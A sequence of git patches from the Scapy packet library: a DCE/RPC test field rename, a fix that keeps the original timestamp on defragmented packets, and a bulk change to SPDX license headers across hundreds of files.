DceRpc(hex_bytes('0400000000000000000000000000000000000000000000000000000000 p.payload.__class__ == conf.raw_layer = DCE/RPC little-endian build -bytes(DceRpc(type='response', endianness='little', opnum=3) / b'\x00\x01\x02\x03') == hex_bytes('04020000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000300ffffffff04000000000000010203') +bytes(DceRpc4(ptype='response', endian='little', opnum=3) / b'\x00\x01\x02\x03') == hex_bytes('04020000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000300ffffffff04000000000000010203') = DCE/RPC little-endian dissection p = DceRpc(hex_bytes('04020000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000300ffffffff04000000000000010203')) -p.type == 2 and p.opnum == 3 and p.frag_len == 4 +p.ptype == 2 and p.opnum == 3 and p.len == 4 From b6e85f945cd2ad2fb7209d8f8d61646a7607b78d Mon Sep 17 00:00:00 2001 From: MinQ Date: Sun, 3 Jul 2022 21:24:13 +0800 Subject: [PATCH 0840/1632] Fix defragmented packet time (#3673) (#3676) Co-authored-by: Shen Mintao --- scapy/sessions.py | 1 + 1 file changed, 1 insertion(+) diff --git a/scapy/sessions.py b/scapy/sessions.py index 62be34ec97d..2e1f19c9ae0 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -140,6 +140,7 @@ def _ip_process_packet(self, packet): defragmented_packet = defragmented_packet.__class__( raw(defragmented_packet) ) + defragmented_packet.time = packet.time return defragmented_packet finally: del self.fragments[uniq] From 9420c2229bf5330c2cc580f114f63f920a68db10 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 4 Jul 2022 21:57:52 +0200 Subject: [PATCH 0841/1632] Add SPDX License identifiers (#3655) * Add SPDX License identifiers * Relicense `ldp.py` with author consent See https://github.com/secdev/scapy/issues/3478 * Apply guedou suggestions * Relicense someim under GPL2 * DCE/RPC licensing --- .config/mypy/mypy_check.py | 6 +- .config/mypy/mypy_deployment_stats.py | 6 +- doc/scapy/_ext/scapy_doc.py | 6 +- doc/vagrant_ci/Vagrantfile | 4 +- doc/vagrant_ci/provision_freebsd.sh | 4 +- doc/vagrant_ci/provision_netbsd.sh | 4 +- doc/vagrant_ci/provision_openbsd.sh | 4 +- scapy/__init__.py | 4 +- scapy/__main__.py | 4 +- scapy/all.py | 4 +- scapy/ansmachine.py | 4 +- scapy/arch/__init__.py | 4 +- scapy/arch/bpf/__init__.py | 5 +- scapy/arch/bpf/consts.py | 5 +- scapy/arch/bpf/core.py | 5 +- scapy/arch/bpf/supersocket.py | 5 +- scapy/arch/common.py | 4 +- scapy/arch/libpcap.py | 6 +- scapy/arch/linux.py | 4 +- scapy/arch/solaris.py | 4 +- scapy/arch/unix.py | 4 +- scapy/arch/windows/__init__.py | 7 +- scapy/arch/windows/native.py | 7 +- scapy/arch/windows/structures.py | 7 +- scapy/as_resolvers.py | 4 +- scapy/asn1/__init__.py | 4 +- scapy/asn1/asn1.py | 6 +- scapy/asn1/ber.py | 6 +- scapy/asn1/mib.py | 6 +- scapy/asn1fields.py | 6 +- scapy/asn1packet.py | 4 +- scapy/automaton.py | 6 +- scapy/autorun.py | 4 +- scapy/base_classes.py | 4 +- scapy/compat.py | 5 +- scapy/config.py | 4 +- scapy/consts.py | 4 +- scapy/contrib/__init__.py | 4 +- scapy/contrib/altbeacon.py | 7 +- scapy/contrib/aoe.py | 5 +- scapy/contrib/automotive/__init__.py | 4 +- scapy/contrib/automotive/bmw/__init__.py | 4 +- scapy/contrib/automotive/bmw/definitions.py | 4 +- scapy/contrib/automotive/bmw/enumerator.py | 4 +- scapy/contrib/automotive/bmw/hsfz.py | 4 +- scapy/contrib/automotive/ccp.py | 4 +- scapy/contrib/automotive/doip.py | 4 +- scapy/contrib/automotive/ecu.py | 6 +- scapy/contrib/automotive/gm/__init__.py | 4 +- scapy/contrib/automotive/gm/gmlan.py | 4 +- .../contrib/automotive/gm/gmlan_ecu_states.py | 4 +- scapy/contrib/automotive/gm/gmlan_logging.py | 4 +- scapy/contrib/automotive/gm/gmlan_scanner.py | 4 +- scapy/contrib/automotive/gm/gmlanutils.py | 8 +- scapy/contrib/automotive/kwp.py | 4 +- scapy/contrib/automotive/obd/__init__.py | 4 +- scapy/contrib/automotive/obd/iid/__init__.py | 4 +- scapy/contrib/automotive/obd/iid/iids.py | 4 +- scapy/contrib/automotive/obd/mid/__init__.py | 4 +- scapy/contrib/automotive/obd/mid/mids.py | 4 +- scapy/contrib/automotive/obd/obd.py | 4 +- scapy/contrib/automotive/obd/packet.py | 4 +- scapy/contrib/automotive/obd/pid/__init__.py | 4 +- scapy/contrib/automotive/obd/pid/pids.py | 4 +- .../contrib/automotive/obd/pid/pids_00_1F.py | 4 +- .../contrib/automotive/obd/pid/pids_20_3F.py | 4 +- .../contrib/automotive/obd/pid/pids_40_5F.py | 4 +- .../contrib/automotive/obd/pid/pids_60_7F.py | 4 +- .../contrib/automotive/obd/pid/pids_80_9F.py | 4 +- .../contrib/automotive/obd/pid/pids_A0_C0.py | 4 +- scapy/contrib/automotive/obd/scanner.py | 4 +- scapy/contrib/automotive/obd/services.py | 4 +- scapy/contrib/automotive/obd/tid/__init__.py | 4 +- scapy/contrib/automotive/obd/tid/tids.py | 4 +- scapy/contrib/automotive/scanner/__init__.py | 4 +- .../automotive/scanner/configuration.py | 4 +- .../contrib/automotive/scanner/enumerator.py | 4 +- scapy/contrib/automotive/scanner/executor.py | 4 +- scapy/contrib/automotive/scanner/graph.py | 4 +- .../automotive/scanner/staged_test_case.py | 4 +- scapy/contrib/automotive/scanner/test_case.py | 4 +- scapy/contrib/automotive/someip.py | 27 +-- scapy/contrib/automotive/uds.py | 4 +- scapy/contrib/automotive/uds_ecu_states.py | 4 +- scapy/contrib/automotive/uds_logging.py | 4 +- scapy/contrib/automotive/uds_scan.py | 4 +- .../contrib/automotive/volkswagen/__init__.py | 4 +- .../automotive/volkswagen/definitions.py | 4 +- scapy/contrib/automotive/xcp/__init__.py | 4 +- .../automotive/xcp/cto_commands_master.py | 4 +- .../automotive/xcp/cto_commands_slave.py | 4 +- scapy/contrib/automotive/xcp/scanner.py | 4 +- scapy/contrib/automotive/xcp/utils.py | 4 +- scapy/contrib/automotive/xcp/xcp.py | 4 +- scapy/contrib/avs.py | 14 +- scapy/contrib/bfd.py | 4 +- scapy/contrib/bgp.py | 14 +- scapy/contrib/bier.py | 14 +- scapy/contrib/bp.py | 26 +-- scapy/contrib/cansocket.py | 4 +- scapy/contrib/cansocket_native.py | 4 +- scapy/contrib/cansocket_python_can.py | 4 +- scapy/contrib/carp.py | 14 +- scapy/contrib/cdp.py | 29 ++-- scapy/contrib/chdlc.py | 14 +- scapy/contrib/coap.py | 19 +-- scapy/contrib/concox.py | 5 +- scapy/contrib/dce_rpc.py | 161 ++++++++++++++++++ scapy/contrib/diameter.py | 39 ++--- scapy/contrib/dtp.py | 14 +- scapy/contrib/eddystone.py | 7 +- scapy/contrib/eigrp.py | 21 +-- scapy/contrib/enipTCP.py | 27 +-- scapy/contrib/erspan.py | 4 +- scapy/contrib/esmc.py | 14 +- scapy/contrib/ethercat.py | 15 +- scapy/contrib/etherip.py | 14 +- scapy/contrib/exposure_notification.py | 10 +- scapy/contrib/geneve.py | 17 +- scapy/contrib/gtp.py | 5 +- scapy/contrib/gtp_v2.py | 17 +- scapy/contrib/gxrp.py | 15 +- scapy/contrib/homeplugav.py | 14 +- scapy/contrib/homepluggp.py | 16 +- scapy/contrib/homeplugsg.py | 16 +- scapy/contrib/http2.py | 31 ++-- scapy/contrib/ibeacon.py | 9 +- scapy/contrib/icmp_extensions.py | 14 +- scapy/contrib/ife.py | 15 +- scapy/contrib/igmp.py | 14 +- scapy/contrib/igmpv3.py | 14 +- scapy/contrib/ikev2.py | 14 +- scapy/contrib/isis.py | 37 +--- scapy/contrib/isotp/__init__.py | 4 +- scapy/contrib/isotp/isotp_native_socket.py | 4 +- scapy/contrib/isotp/isotp_packet.py | 5 +- scapy/contrib/isotp/isotp_scanner.py | 4 +- scapy/contrib/isotp/isotp_soft_socket.py | 4 +- scapy/contrib/isotp/isotp_utils.py | 4 +- scapy/contrib/knx.py | 41 ++--- scapy/contrib/lacp.py | 14 +- scapy/contrib/ldp.py | 23 +-- scapy/contrib/lldp.py | 15 +- scapy/contrib/loraphy2wan.py | 20 +-- scapy/contrib/ltp.py | 26 +-- scapy/contrib/mac_control.py | 15 +- scapy/contrib/macsec.py | 4 +- scapy/contrib/modbus.py | 22 +-- scapy/contrib/mount.py | 4 +- scapy/contrib/mpls.py | 14 +- scapy/contrib/mqtt.py | 4 +- scapy/contrib/mqttsn.py | 15 +- scapy/contrib/nfs.py | 4 +- scapy/contrib/nlm.py | 4 +- scapy/contrib/nsh.py | 14 +- scapy/contrib/oncrpc.py | 4 +- scapy/contrib/opc_da.py | 22 +-- scapy/contrib/openflow.py | 15 +- scapy/contrib/openflow3.py | 16 +- scapy/contrib/ospf.py | 23 +-- scapy/contrib/pfcp.py | 23 +-- scapy/contrib/pim.py | 16 +- scapy/contrib/pnio.py | 16 +- scapy/contrib/pnio_dcp.py | 17 +- scapy/contrib/pnio_rpc.py | 15 +- scapy/contrib/portmap.py | 4 +- scapy/contrib/ppi_cace.py | 15 +- scapy/contrib/ppi_geotag.py | 15 +- scapy/contrib/ripng.py | 14 +- scapy/contrib/roce.py | 4 +- scapy/contrib/rpl.py | 20 +-- scapy/contrib/rpl_metrics.py | 20 +-- scapy/contrib/rsvp.py | 20 +-- scapy/contrib/rtcp.py | 4 +- scapy/contrib/rtps/__init__.py | 20 +-- scapy/contrib/rtps/common_types.py | 22 +-- scapy/contrib/rtps/pid_types.py | 22 +-- scapy/contrib/rtps/rtps.py | 22 +-- scapy/contrib/rtr.py | 23 +-- scapy/contrib/scada/__init__.py | 6 +- scapy/contrib/scada/iec104/__init__.py | 6 +- scapy/contrib/scada/iec104/iec104_fields.py | 4 +- .../iec104/iec104_information_elements.py | 4 +- .../iec104/iec104_information_objects.py | 6 +- scapy/contrib/scada/pcom.py | 31 ++-- scapy/contrib/sdnv.py | 26 +-- scapy/contrib/sebek.py | 4 +- scapy/contrib/send.py | 22 +-- scapy/contrib/skinny.py | 28 +-- scapy/contrib/slowprot.py | 14 +- scapy/contrib/socks.py | 5 +- scapy/contrib/spbm.py | 52 +++--- scapy/contrib/tacacs.py | 22 +-- scapy/contrib/tcpao.py | 4 +- scapy/contrib/tzsp.py | 15 +- scapy/contrib/ubberlogger.py | 14 +- scapy/contrib/vqp.py | 14 +- scapy/contrib/vtp.py | 14 +- scapy/contrib/wireguard.py | 15 +- scapy/contrib/wpa_eapol.py | 14 +- scapy/dadict.py | 4 +- scapy/data.py | 4 +- scapy/error.py | 4 +- scapy/fields.py | 6 +- scapy/interfaces.py | 7 +- scapy/layers/__init__.py | 4 +- scapy/layers/all.py | 4 +- scapy/layers/bluetooth.py | 4 +- scapy/layers/bluetooth4LE.py | 7 +- scapy/layers/can.py | 4 +- scapy/layers/clns.py | 16 +- scapy/layers/dcerpc.py | 15 +- scapy/layers/dhcp.py | 4 +- scapy/layers/dhcp6.py | 6 +- scapy/layers/dns.py | 4 +- scapy/layers/dot11.py | 16 +- scapy/layers/dot15d4.py | 10 +- scapy/layers/eap.py | 4 +- scapy/layers/gprs.py | 4 +- scapy/layers/gssapi.py | 6 +- scapy/layers/hsrp.py | 38 +---- scapy/layers/http.py | 8 +- scapy/layers/inet.py | 4 +- scapy/layers/inet6.py | 27 +-- scapy/layers/ipsec.py | 19 +-- scapy/layers/ir.py | 4 +- scapy/layers/isakmp.py | 4 +- scapy/layers/l2.py | 4 +- scapy/layers/l2tp.py | 4 +- scapy/layers/ldap.py | 4 +- scapy/layers/llmnr.py | 4 +- scapy/layers/lltd.py | 4 +- scapy/layers/mgcp.py | 4 +- scapy/layers/mobileip.py | 4 +- scapy/layers/netbios.py | 4 +- scapy/layers/netflow.py | 7 +- scapy/layers/ntlm.py | 6 +- scapy/layers/ntp.py | 4 +- scapy/layers/pflog.py | 4 +- scapy/layers/ppp.py | 4 +- scapy/layers/pptp.py | 4 +- scapy/layers/radius.py | 7 +- scapy/layers/rip.py | 4 +- scapy/layers/rtp.py | 4 +- scapy/layers/sctp.py | 4 +- scapy/layers/sixlowpan.py | 6 +- scapy/layers/skinny.py | 4 +- scapy/layers/smb.py | 4 +- scapy/layers/smb2.py | 4 +- scapy/layers/snmp.py | 4 +- scapy/layers/tftp.py | 4 +- scapy/layers/tls/__init__.py | 3 +- scapy/layers/tls/all.py | 3 +- scapy/layers/tls/automaton.py | 3 +- scapy/layers/tls/automaton_cli.py | 3 +- scapy/layers/tls/automaton_srv.py | 3 +- scapy/layers/tls/basefields.py | 3 +- scapy/layers/tls/cert.py | 3 +- scapy/layers/tls/crypto/__init__.py | 3 +- scapy/layers/tls/crypto/all.py | 3 +- scapy/layers/tls/crypto/cipher_aead.py | 3 +- scapy/layers/tls/crypto/cipher_block.py | 3 +- scapy/layers/tls/crypto/cipher_stream.py | 3 +- scapy/layers/tls/crypto/ciphers.py | 3 +- scapy/layers/tls/crypto/common.py | 4 +- scapy/layers/tls/crypto/compression.py | 3 +- scapy/layers/tls/crypto/groups.py | 3 +- scapy/layers/tls/crypto/h_mac.py | 3 +- scapy/layers/tls/crypto/hash.py | 3 +- scapy/layers/tls/crypto/hkdf.py | 3 +- scapy/layers/tls/crypto/kx_algs.py | 3 +- scapy/layers/tls/crypto/pkcs1.py | 3 +- scapy/layers/tls/crypto/prf.py | 5 +- scapy/layers/tls/crypto/suites.py | 3 +- scapy/layers/tls/extensions.py | 3 +- scapy/layers/tls/handshake.py | 3 +- scapy/layers/tls/handshake_sslv2.py | 3 +- scapy/layers/tls/keyexchange.py | 3 +- scapy/layers/tls/keyexchange_tls13.py | 3 +- scapy/layers/tls/record.py | 3 +- scapy/layers/tls/record_sslv2.py | 3 +- scapy/layers/tls/record_tls13.py | 3 +- scapy/layers/tls/session.py | 3 +- scapy/layers/tls/tools.py | 3 +- scapy/layers/tuntap.py | 5 +- scapy/layers/usb.py | 7 +- scapy/layers/vrrp.py | 4 +- scapy/layers/vxlan.py | 4 +- scapy/layers/x509.py | 8 +- scapy/layers/zigbee.py | 7 +- scapy/libs/__init__.py | 4 +- scapy/libs/ethertypes.py | 2 +- scapy/libs/matplot.py | 4 +- scapy/libs/six.py | 2 +- scapy/libs/structures.py | 6 +- scapy/libs/test_pyx.py | 5 +- scapy/libs/winpcapy.py | 6 +- scapy/main.py | 4 +- scapy/modules/__init__.py | 4 +- scapy/modules/krack/__init__.py | 4 + scapy/modules/krack/automaton.py | 4 + scapy/modules/krack/crypto.py | 4 + scapy/modules/nmap.py | 4 +- scapy/modules/p0f.py | 4 +- scapy/modules/p0fv2.py | 4 +- scapy/modules/voip.py | 4 +- scapy/packet.py | 4 +- scapy/pipetool.py | 4 +- scapy/plist.py | 4 +- scapy/pton_ntop.py | 4 +- scapy/route.py | 4 +- scapy/route6.py | 5 +- scapy/scapypipes.py | 4 +- scapy/sendrecv.py | 4 +- scapy/sessions.py | 5 +- scapy/supersocket.py | 4 +- scapy/themes.py | 4 +- scapy/tools/UTscapy.py | 4 +- scapy/tools/__init__.py | 4 +- scapy/tools/automotive/__init__.py | 4 +- scapy/tools/automotive/isotpscanner.py | 4 +- scapy/tools/automotive/obdscanner.py | 6 +- scapy/tools/automotive/xcpscanner.py | 6 +- scapy/tools/check_asdis.py | 5 + scapy/tools/generate_ethertypes.py | 7 +- scapy/tools/scapy_pyannotate.py | 5 +- scapy/utils.py | 4 +- scapy/utils6.py | 5 +- scapy/volatile.py | 4 +- setup.py | 2 +- test/benchmark/common.py | 4 +- test/benchmark/dissection_and_build.py | 4 +- test/benchmark/latency_router.py | 4 +- test/contrib/automotive/interface_mockup.py | 4 +- test/testsocket.py | 4 +- test/tls/__init__.py | 7 +- test/tls/example_client.py | 5 +- test/tls/example_server.py | 5 +- 338 files changed, 1141 insertions(+), 1703 deletions(-) create mode 100644 scapy/contrib/dce_rpc.py diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index 4d4bdf27644..7b69a2ee3c7 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Performs Static typing checks over Scapy's codebase diff --git a/.config/mypy/mypy_deployment_stats.py b/.config/mypy/mypy_deployment_stats.py index 209a19cb73a..737bef71f3b 100644 --- a/.config/mypy/mypy_deployment_stats.py +++ b/.config/mypy/mypy_deployment_stats.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See https://scapy.net for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Generate MyPy deployment stats diff --git a/doc/scapy/_ext/scapy_doc.py b/doc/scapy/_ext/scapy_doc.py index 51eb54a705d..678a9792fcc 100644 --- a/doc/scapy/_ext/scapy_doc.py +++ b/doc/scapy/_ext/scapy_doc.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ A Sphinx Extension for Scapy's doc preprocessing diff --git a/doc/vagrant_ci/Vagrantfile b/doc/vagrant_ci/Vagrantfile index b4d5021d3c9..c5b6af96ff7 100644 --- a/doc/vagrant_ci/Vagrantfile +++ b/doc/vagrant_ci/Vagrantfile @@ -1,10 +1,10 @@ # -*- mode: ruby -*- # vi: set ft=ruby : +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license Vagrant.configure("2") do |config| diff --git a/doc/vagrant_ci/provision_freebsd.sh b/doc/vagrant_ci/provision_freebsd.sh index bb7b84e8f52..f3044049951 100644 --- a/doc/vagrant_ci/provision_freebsd.sh +++ b/doc/vagrant_ci/provision_freebsd.sh @@ -1,9 +1,9 @@ #!/usr/local/bin/bash +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license pkg update pkg install --yes git python2 python3 py37-virtualenv py27-sqlite3 py37-sqlite3 bash rust diff --git a/doc/vagrant_ci/provision_netbsd.sh b/doc/vagrant_ci/provision_netbsd.sh index 439a2f8047c..e887d606437 100644 --- a/doc/vagrant_ci/provision_netbsd.sh +++ b/doc/vagrant_ci/provision_netbsd.sh @@ -1,9 +1,9 @@ #!/bin/bash +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license RELEASE="9.0_2020Q4" diff --git a/doc/vagrant_ci/provision_openbsd.sh b/doc/vagrant_ci/provision_openbsd.sh index 226df390e1f..397c4b8653f 100644 --- a/doc/vagrant_ci/provision_openbsd.sh +++ b/doc/vagrant_ci/provision_openbsd.sh @@ -1,9 +1,9 @@ #!/bin/bash +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license sudo pkg_add git python-2.7.18p0 python3 py-virtualenv sudo mkdir -p /usr/local/test/ diff --git a/scapy/__init__.py b/scapy/__init__.py index 8d44a9faec4..10739ec6200 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Scapy: create, send, sniff, dissect and manipulate network packets. diff --git a/scapy/__main__.py b/scapy/__main__.py index 5a08e1347c8..9d06883d742 100644 --- a/scapy/__main__.py +++ b/scapy/__main__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Scapy: create, send, sniff, dissect and manipulate network packets. diff --git a/scapy/all.py b/scapy/all.py index b07be8af034..1c67e8b06ad 100644 --- a/scapy/all.py +++ b/scapy/all.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Aggregate top level objects from all Scapy modules. diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index d1b64e5b864..228f9b6755e 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Answering machines. diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 0f0e6c5cec7..f05e072133a 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Operating system specific functionality. diff --git a/scapy/arch/bpf/__init__.py b/scapy/arch/bpf/__init__.py index 2560caa12f4..b1ca74078d0 100644 --- a/scapy/arch/bpf/__init__.py +++ b/scapy/arch/bpf/__init__.py @@ -1,4 +1,7 @@ -# Guillaume Valadon +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Guillaume Valadon """ Scapy BSD native support diff --git a/scapy/arch/bpf/consts.py b/scapy/arch/bpf/consts.py index 7bf4867e979..3ea84277496 100644 --- a/scapy/arch/bpf/consts.py +++ b/scapy/arch/bpf/consts.py @@ -1,4 +1,7 @@ -# Guillaume Valadon +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Guillaume Valadon """ Scapy BSD native support - constants diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 428710194e4..bc41800daa3 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -1,4 +1,7 @@ -# Guillaume Valadon +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Guillaume Valadon """ Scapy *BSD native support - core diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 1d89ed2d0e7..3610cba2204 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -1,4 +1,7 @@ -# Guillaume Valadon +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Guillaume Valadon """ Scapy *BSD native support - BPF sockets diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 995f3e223e5..ad4d24138c9 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Functions common to different architectures diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 3b1e0fe0061..8fa51351641 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Packet sending and receiving libpcap/WinPcap. diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index fcfe78bdbce..8474cde0406 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Linux specific functions. diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index 85f4d3d3d12..1b23c863f63 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Customization for the Solaris operation system. diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 7d9d4b7f1c4..713a7cb708c 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Common customizations for all Unix-like operating systems other than Linux diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index fb220594cb4..2e6aad9fcce 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Customizations needed to support Microsoft Windows. diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 0d718a82063..e4ef9661181 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter """ Native Microsoft Windows sockets (L3 only) diff --git a/scapy/arch/windows/structures.py b/scapy/arch/windows/structures.py index 1cac35e0899..a61827cd28c 100644 --- a/scapy/arch/windows/structures.py +++ b/scapy/arch/windows/structures.py @@ -1,8 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Copyright (C) Philippe Biondi -# Copyright (C) Gabriel Potter -# This program is published under a GPLv2 license +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter # flake8: noqa E266 # (We keep comment boxes, it's then one-line comments) diff --git a/scapy/as_resolvers.py b/scapy/as_resolvers.py index e75d0551197..4f0ebb0b744 100644 --- a/scapy/as_resolvers.py +++ b/scapy/as_resolvers.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Resolve Autonomous Systems (AS). diff --git a/scapy/asn1/__init__.py b/scapy/asn1/__init__.py index 31debcc2716..39c022f6767 100644 --- a/scapy/asn1/__init__.py +++ b/scapy/asn1/__init__.py @@ -1,7 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# This program is published under a GPLv2 license """ Package holding ASN.1 related modules. diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 77777265a36..8054228f917 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Modified by Maxence Tury -# This program is published under a GPLv2 license +# Acknowledgment: Maxence Tury """ ASN.1 (Abstract Syntax Notation One) diff --git a/scapy/asn1/ber.py b/scapy/asn1/ber.py index ef5e9e01ead..fe27dd81fc7 100644 --- a/scapy/asn1/ber.py +++ b/scapy/asn1/ber.py @@ -1,9 +1,9 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Modified by Maxence Tury +# Acknowledgment: Maxence Tury # Acknowledgment: Ralph Broenink -# This program is published under a GPLv2 license """ Basic Encoding Rules (BER) for ASN.1 diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index bdb020b36c2..c0f071e5d38 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -1,8 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-only # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information +# See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# 